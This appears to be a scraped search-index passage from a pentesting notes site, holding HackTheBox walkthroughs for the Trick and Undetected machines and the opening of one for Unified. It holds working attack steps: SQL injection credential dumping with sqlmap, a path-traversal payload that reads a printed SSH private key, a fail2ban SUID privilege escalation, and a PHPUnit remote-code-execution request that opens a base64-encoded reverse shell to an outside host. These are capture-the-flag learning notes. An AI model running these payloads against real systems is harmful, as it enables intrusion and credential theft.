                        PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey:\n|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)\n|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)\n|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)\n25/tcp open  smtp    Postfix smtpd\n|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)\n| dns-nsid:\n|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian\n80/tcp open  http    nginx 1.14.2\n|_http-title: Coming Soon - Start Bootstrap Theme\n|_http-server-header: nginx/1.14.2\nService Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration","title":"Directory enumeration","text":"

                        We can use gobuster to enumerate directories:

                        gobuster dir -u $ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#dns-enumeration","title":"dns enumeration","text":"

                        Run:

                        dnslookup\n

                        And after that:

                        > SERVER 10.10.11.166\n

                        Results:

                        Default server: 10.10.11.166\nAddress: 10.10.11.166#53\n

                        Then, we run:

                        > 10.10.11.166\n

                        And as a result, we have:

                        166.11.10.10.in-addr.arpa       name = trick.htb.\n

                        Now we have a dns name: trick.htb. We can dig it with:

                        dig trick.htb axfr @10.10.11.166\n

                        And the results:

                        ; <<>> DiG 9.18.6-2-Debian <<>> trick.htb axfr @10.10.11.166\n;; global options: +cmd\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\ntrick.htb.              604800  IN      NS      trick.htb.\ntrick.htb.              604800  IN      A       127.0.0.1\ntrick.htb.              604800  IN      AAAA    ::1\npreprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\n;; Query time: 96 msec\n;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)\n;; WHEN: Wed Oct 19 13:20:24 EDT 2022\n;; XFR size: 6 records (messages 1, bytes 231)\n

                        Finally we have these dns domains: + trick.htb + preprod-payroll.trick.htb + root.trick.htb

                        ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file","title":"Edit /etc/hosts file","text":"

                        We add the given subdomain to our /etc/hosts file. First we open the /etc/hosts file with an editor. For instance, nano.

                        sudo nano /etc/hosts\n
                        We move the cursor to the end and we add these lines:

                        10.10.11.166    trick.htb\n10.10.11.166    preprod-payroll.trick.htb\n10.10.11.166    root.trick.htb\n

                        Now we can use the browser to go to: http://preprod-payroll.trick.htb

                        And start again with directory enumeration.

                        ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration_1","title":"Directory enumeration","text":"

                        Run the dictionary:

                        gobuster dir -u http://preprod-payroll.trick.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n

                        Results:

                        Dirs found with a 302 response:\n\n/\n\nDirs found with a 403 response:\n\n/assets/\n/database/\n/assets/vendor/\n/assets/img/\n/assets/vendor/jquery/\n/assets/DataTables/\n/assets/vendor/bootstrap/\n/assets/vendor/bootstrap/js/\n/assets/vendor/jquery.easing/\n/assets/css/\n/assets/vendor/php-email-form/\n/assets/vendor/venobox/\n/assets/vendor/waypoints/\n/assets/vendor/counterup/\n/assets/vendor/owl.carousel/\n/assets/vendor/bootstrap-datepicker/\n/assets/vendor/bootstrap-datepicker/js/\n/assets/js/\n/assets/font-awesome/\n/assets/font-awesome/js/\n/assets/vendor/owl.carousel/assets/\n/assets/vendor/bootstrap/css/\n/assets/vendor/bootstrap-datepicker/css/\n/assets/font-awesome/css/\n/assets/vendor/bootstrap-datepicker/locales/\n/assets/font-awesome/less/\n\n\n--------------------------------\nFiles found during testing:\n\nFiles found with a 302 responce:\n\n/index.php\n\nFiles found with a 200 responce:\n\n/login.php\n/home.php\n/header.php\n/users.php\n/ajax.php\n/navbar.php\n/assets/vendor/jquery/jquery.min.js\n/assets/DataTables/datatables.min.js\n/assets/vendor/bootstrap/js/bootstrap.bundle.min.js\n/assets/vendor/jquery.easing/jquery.easing.min.js\n/assets/vendor/php-email-form/validate.js\n/assets/vendor/venobox/venobox.min.js\n/assets/vendor/waypoints/jquery.waypoints.min.js\n/assets/vendor/counterup/counterup.min.js\n/assets/vendor/owl.carousel/owl.carousel.min.js\n/assets/js/select2.min.js\n/assets/vendor/bootstrap-datepicker/js/bootstrap-datepicker.min.js\n/assets/js/jquery.datetimepicker.full.min.js\n/assets/js/jquery-te-1.4.0.min.js\n/assets/font-awesome/js/all.min.js\n/department.php\n/topbar.php\n/position.php\n/employee.php\n/payroll.php\n

                        In http://preprod-payroll.trick.htb/users.php there is this info:

                        name: Administrator\nusername: Enemigosss\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#exploiting-a-sql-injection-vulnerability","title":"Exploiting a sql injection vulnerability","text":"

                        If we have a look at the forms at http://preprod-payroll.trick.htb/login.php and run sqlmap, we'll see that it is vulnerable to SQL injection - Blind.

                        We can extract databases:

                        sqlmap -r login --dbs\n

                        Results:

                        available databases [2]:\n[*] information_schema\n[*] payroll_db\n

                        Now, we extract tables from payroll_db database:

                        sqlmap -r login -D payroll_db --tables\n

                        Results:

                        Database: payroll_db\n[11 tables]\n+---------------------+\n| position            |\n| allowances          |\n| attendance          |\n| deductions          |\n| department          |\n| employee            |\n| employee_allowances |\n| employee_deductions |\n| payroll             |\n| payroll_items       |\n| users               |\n+---------------------+\n

                        Next, we get columns from the users table:

                        sqlmap -r login -D payroll_db -T users --columns\n

                        Results:

                        Database: payroll_db\nTable: users\n[8 columns]\n+-----------+--------------+\n| Column    | Type         |\n+-----------+--------------+\n| address   | text         |\n| contact   | text         |\n| doctor_id | int(30)      |\n| id        | int(30)      |\n| name      | varchar(200) |\n| password  | varchar(200) |\n| type      | tinyint(1)   |\n| username  | varchar(100) |\n+-----------+--------------+\n

                        And finally we can get usernames and passwords:

                        sqlmap -r login -D payroll_db -T users -C username,password --dump\n

                        Results:

                        Database: payroll_db\nTable: users\n[1 entry]\n+------------+-----------------------+\n| username   | password              |\n+------------+-----------------------+\n| Enemigosss | SuperGucciRainbowCake |\n+------------+-----------------------+\n

                        We can login at http://preprod-payroll.trick.htb and see an administration pannel, but other than information disclosure, we cannot find a vuln to get into the server.

                        ","tags":["walkthrough"]},{"location":"htb-trick/#dns-fuzzing","title":"DNS fuzzing","text":"

                        Since the subdomain name (http://preprod-payroll.trick.htb/) looks interesting as \u201cpayroll\u201d can be replaced with another word, we can consider fuzzing it. Firstly, we will need to figure out the non-existence subdomain query\u2019s error response size. Then we fuzz for a subdomain.

                        curl -s -H \"Host: nonexistent.trick.htb\" https://trick.htb | wc -c\n

                        And it returns 5480, which is the filter that we will use in th ffuz command.

                        Now we can keep on enumerating subdomains with ffuz:

                        ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000-trick.txt -u http://trick.htb -H \u201cHost: FUZZ.trick.htb\u201d -fs 5480\n

                        If we add -fs 5480 to the command this will filter out the responses that are 5480 bytes in length (which are non-existent subdomains) and we can pinpoint what is a real finding.

                        ffuf -H \"Host: preprod-FUZZ.trick.htb\" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.166 -fs 5480\n

                        Adding the filter reveals a new subdomain called preprod-marketing. Results:

                                /'___\\  /'___\\           /'___\\       \n       /\\ \\__/ /\\ \\__/  __  __  /\\ \\__/       \n       \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/      \n         \\ \\_\\   \\ \\_\\  \\ \\____/  \\ \\_\\       \n          \\/_/    \\/_/   \\/___/    \\/_/       \n\n       v1.5.0 Kali Exclusive <3\n________________________________________________\n\n :: Method           : GET\n :: URL              : http://10.10.11.166\n :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n :: Header           : Host: preprod-FUZZ.trick.htb\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500\n :: Filter           : Response size: 5480\n________________________________________________\n\nmarketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 267ms]\npc169                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 212ms]\npayroll                 [Status: 302, Size: 9546, Words: 1453, Lines: 267, Duration: 116ms]\n77msccom                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 183ms\n
                        ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file_1","title":"Edit /etc/hosts file","text":"

                        We add the given subdomain to our /etc/hosts file. First we open the /etc/hosts file with an editor. For instance, nano.

                        sudo nano /etc/hosts\n

                        We move the cursor to the end and we add these lines:

                        10.10.11.166    preprod-marketing.trick.htb\n

                        We introduce the address into the browser and we can see a website. In one of the pages there is a path traversal vulnerability:

                        http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././etc/passwd\n

                        Results:

                        root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin\ntss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false\ndnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nusbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\nrtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\npulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\nspeech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\nsaned:x:112:121::/var/lib/saned:/usr/sbin/nologin\ncolord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\ngeoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin\nhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nDebian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false\nsshd:x:118:65534::/run/sshd:/usr/sbin/nologin\npostfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin\nbind:x:120:128::/var/cache/bind:/usr/sbin/nologin\nmichael:x:1001:1001::/home/michael:/bin/bash\n

                        Now, we can infer somehow that in /home/michael we can find a .ssh folder with teh id_rsa public ssh signature. To download it, we can use burp and capture this petition:

                        http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././home/michael/.ssh/id_rsa\n

                        As a result, we can download michael's public key to login via ssh:

                        HTTP/1.1 200 OK\nServer: nginx/1.14.2\nDate: Thu, 20 Oct 2022 08:25:41 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nContent-Length: 1823\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz\nc4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G\nYQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+\n4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/\nUkn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4\n1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC\nDkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0\n+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE\nhkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L\njnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6\nIqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C\naUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/\nKwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC\ntnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge\nU+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0\nfHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V\nPH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS\n3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA\nfvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT\nAuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn\nIn16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP\nJkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN\njsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+\nIJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n

                        Now we save it with the name we want and change its permissions:

                        nano key\n# CTRl-MAY V to paste it\n# CTRL-X, Yes and ENTER to save the buffer and exit\nsudo chmod 400 key\n

                        And we can login as michael:

                        ssh -i key michael@10.10.11.166\n

                        In /home/michael we have the user flag: user.txt.

                        ","tags":["walkthrough"]},{"location":"htb-trick/#escalation-of-privileges","title":"Escalation of privileges","text":"

                        Getting the system flag. Check michael's groups:

                        id\n

                        Results:

                        uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)\n

                        Check michael's permissions:

                        sudo -l\n

                        Results:

                        Matching Defaults entries for michael on trick:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\n\nUser michael may run the following commands on trick:\n    (root) NOPASSWD: /etc/init.d/fail2ban restart\n

                        Interesting part here is that michael may run fail2ban command as root without any password. This is due to a misconfiguration and we can exploit it.

                        For starters, michael has writing permissions over the configuration files located in /etc/fail2ban/action.d

                        Run:

                        ls -la /etc/fail2ban\n

                        And we can see michael, as part of the security group has rwx rights on the directory owned by root:

                        ...\ndrwxrwx---   2 root security  4096 Oct 20 11:03 action.d\n...\n

                        Now we need to understand what fail2ban is and how it works. fail2ban is a great IDPS tool, not only it can detect attacks but also block malicious IP addresses by using Linux iptables. Although fail2ban can be used for services like HTTP, SMTP, IMAP, etc. most sys-admins use it to protect the SSH service. fail2ban daemon reads the log files and if there is a malicious pattern detected (e.g multiple failed login requests) it executes a command for blocking the IP for a certain period of time or maybe forever.

                        In the file /etc/fail2ban/jail.conf, we can spot some customizations such as ban time and maxretry:

                        cat /etc/fail2ban/jail.conf\n

                        And we see that bantime is limited to 10 seconds and maximum of retries to 5:

                        # \"bantime\" is the number of seconds that a host is banned.\nbantime  = 10s\n\n# A host is banned if it has generated \"maxretry\" during the last \"findtime\"\n# seconds.\nfindtime  = 10s\n\n# \"maxretry\" is the number of failures before a host gets banned.\nmaxretry = 5\n

                        This means that if we retry ssh connection six times (so we exceed the maxretry parameter), the file /etc/fail2ban/action.d/iptables-multiport.conf will be executed as root, and as a consequence, our host will be banned. Now, as part of the security group michael does have rwx permissions on the parent folder /etc/fail2ban/action.d, but not on the file /etc/fail2ban/action.d/iptables-multiport.conf:

                        ls -la /etc/fail2ban/action.d/iptables-multiport.conf\n

                        Result:

                        -rw-r--r-- 1 root root 1420 Oct 20 12:48 iptables-multiport.conf\n

                        We need then, to be able to edit that file to include our malicious code. As the service fail2ban is restarted every minute or so, you need to execute the following commands quickly. They will allow you to overwrite the file /etc/fail2ban/action.d/iptables-multiport.conf:

                        # create a copy of the file to have rwx permissions\nmv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak\n# overwrite the existing file with your copy\ncp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf\n# edit the file and add your lines\nnano /etc/fail2ban/action.d/iptables-multiport.conf\n# In the file, comment the line with the  actionban definition and\n# add:\n# actionban = chmod +s /bin/bash\n# Also in the file, comment the line with the  actionunban definition and\n# add:\n# actionunban = chmod +s /bin/bash\n# CTRL-X -   Yes and ENTER to save changes.\n

                        With \"chmod +s /bin/bash\" we're going to give the suid bit to bash. The suid bit provides the user running it the same privileges that the user who created it. In this case, root is the user who created it. If we run it, we'll have root privileges during its execution. The next step is restarting the service to get the file iptables-multiport.conf updated.

                        sudo /etc/init.d/fail2ban restart\n

                        Now, when we fail to login into the system with ssh more than 5 times, the configuration set in iptables-multiport.conf will take place. For that, from the attacker command line:

                        1. We install sshpass, a program that allows us to pass passwords in the command line to ssh. This way we can automate the login process:
                        sudo apt install sshpass\n
                        1. Write a script in the attacker machine:
                        nano wronglogin.sh\n
                        #!/bin/bash\n\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\n

                        Add execution permission:

                        chmod +x wronglongin.sh\n
                        1. Launch the script:
                        ./wronglogin.sh\n

                        Once the script is executed, the suid bit will be activated for bash. Run:

                         ls -l /bin/bash\n

                        And you will see:

                        -rwsr-sr-x 1 root root 1168776 Oct 20  2022 /bin/bash\n

                        Now if we run:

                        bash -p\n

                        The -p flag turns on privileged mode. In this mode, the $BASH_ENV' and '$ENV' files are not processed, shell functions are not inherited from the environment, and theSHELLOPTS', 'BASHOPTS', 'CDPATH' and 'GLOBIGNORE' variables, if they appear in the environment, are ignored. The result:

                        michael@trick:~$ bash -p\nbash-5.0# id\nuid=1001(michael) gid=1001(michael) euid=0(root) egid=0(root) groups=0(root),1001(michael),1002(security)\nbash-5.0# cd /root\nbash-5.0# ls\nf2b.sh  fail2ban  root.txt  set_dns.sh\n

                        To display the system flag:

                        cat root.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-undetected/","title":"HTB undetected","text":"
                        nmap -sV -sC -Pn $ip --top-ports 4250\n

                        Open ports: 22 and 80.

                        Entering the IP in a browser we get to a website.

                        Revising the source code, we see that the menu \"Store\" is linking to http://store.djewelry.htb/.

                        Another way to find out:

                        # with gobuster\ngobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/namelist.txt \n

                        Open /etc/hosts and add IP and store.djewelry.htb, djewelry.htb.

                        After browsing around both websites, we found nothing noticeable, so we try to fuzz both subdomains:

                        # With wfuzz\nwfuzz -c --hc 404 -t 200 -u http://store.djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n\nwfuzz -c --hc 404 -t 200 -u http://djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n

                        Nothing interesting under main domain, but in http://store.djewelry.htb:

                        ********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http://store.djewelry.htb/FUZZ\nTotal requests: 4614\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                    \n=====================================================================\n\n000000001:   200        195 L    475 W      6203 Ch     \"http://store.djewelry.htb/\n                                                        \"                          \n000000013:   403        9 L      28 W       283 Ch      \".htpasswd\"                \n000000012:   403        9 L      28 W       283 Ch      \".htaccess\"                \n000000011:   403        9 L      28 W       283 Ch      \".hta\"                     \n000001114:   301        9 L      28 W       322 Ch      \"css\"                      \n000001648:   301        9 L      28 W       324 Ch      \"fonts\"                    \n000002021:   200        195 L    475 W      6203 Ch     \"index.php\"                \n000001991:   301        9 L      28 W       325 Ch      \"images\"                   \n000002179:   301        9 L      28 W       321 Ch      \"js\"                       \n000003588:   403        9 L      28 W       283 Ch      \"server-status\"            \n000004286:   301        9 L      28 W       325 Ch      \"vendor\"                   \n\nTotal time: 0\nProcessed Requests: 4614\nFiltered Requests: 4603\nRequests/sec.: 0\n

                        /vendor is a directory list, so we can browse all files and folders under /vendor.

                        After browsing for a while, we get information about this plugin with a vulnerable version installed (all plugins installed with versions: http://store.djewelry.htb/vendor/composer/installed.json). Vulnerable plugin is \"phpunit/phpunit\",\"5.6.2\".

                        Some exploits:

                        https://blog.ovhcloud.com/cve-2017-9841-what-is-it-and-how-do-we-protect-our-customers/

                        In my case:

                        curl -XGET --data \"<?php system('whoami');?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n
                        www-data\n

                        Now, we can get a reverse shell:

                        My reverse code before b64 it: \"bash -i >& /dev/tcp/10.10.14.2/4444 0>&1\"

                        curl -XGET --data \"<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzQ0NDQgMD4mMQo=|base64 -d|bash'); ?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n

                        See a walkthrough: https://0xdf.gitlab.io/2022/07/02/htb-undetected.html

                        "},{"location":"htb-unified/","title":"Walkthrough - Unified - A HackTheBox machine","text":"

                        Enumerate open services:

                        nmap -sC -sV $ip -Pn\n

                        Results:

                        PORT     STATE SERVICE         VERSION\n22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=\n|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=\n|   256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR\n6789/tcp open  ibm-db2-admin?\n8080/tcp open  http-proxy\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to https://10.129.96.149:8443/manage\n| fingerprint-strings: \n|   FourOhFourRequest: \n|     HTTP/1.1 404 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 431\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 404 \n|     Found</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 \n|     Found</h1></body></html>\n|   GetRequest, HTTPOptions: \n|     HTTP/1.1 302 \n|     Location: http://localhost:8080/manage\n|     Content-Length: 0\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|   RTSPRequest, Socks5: \n|     HTTP/1.1 400 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 435\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 400 \n|     Request</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 \n|_    Request</h1></body></html>\n|_http-open-proxy: Proxy might be redirecting requests\n8443/tcp open  ssl/nagios-nsca Nagios NSCA\n| http-title: UniFi Network\n|_Requested resource was /manage/account/login?redirect=%2Fmanage\n| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Subject Alternative Name: DNS:UniFi\n| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-12-30T21:37:24\n| Not valid after:  2024-04-03T21:37:24\n| MD5:   e6be8c035e126827d1fe612ddc76a919\n| SHA-1: 111baa119cca44017cec6e03dc455cfe65f6d829\n| -----BEGIN CERTIFICATE-----\n| MIIDfTCCAmWgAwIBAgIEYc4mlDANBgkqhkiG9w0BAQsFADBrMQswCQYDVQQGEwJV\n

                        After visiting https://10.129.96.149:8080/, we are redirected to https://10.129.96.149:8443/manage/account/login

                        It's a login panel of Unifi application and version is disclosed: 6.4.54. A quick search in google for \"exploit unifi 6.4.54\" returns that it has a log4j vulnerability.

                        For exploiting it:

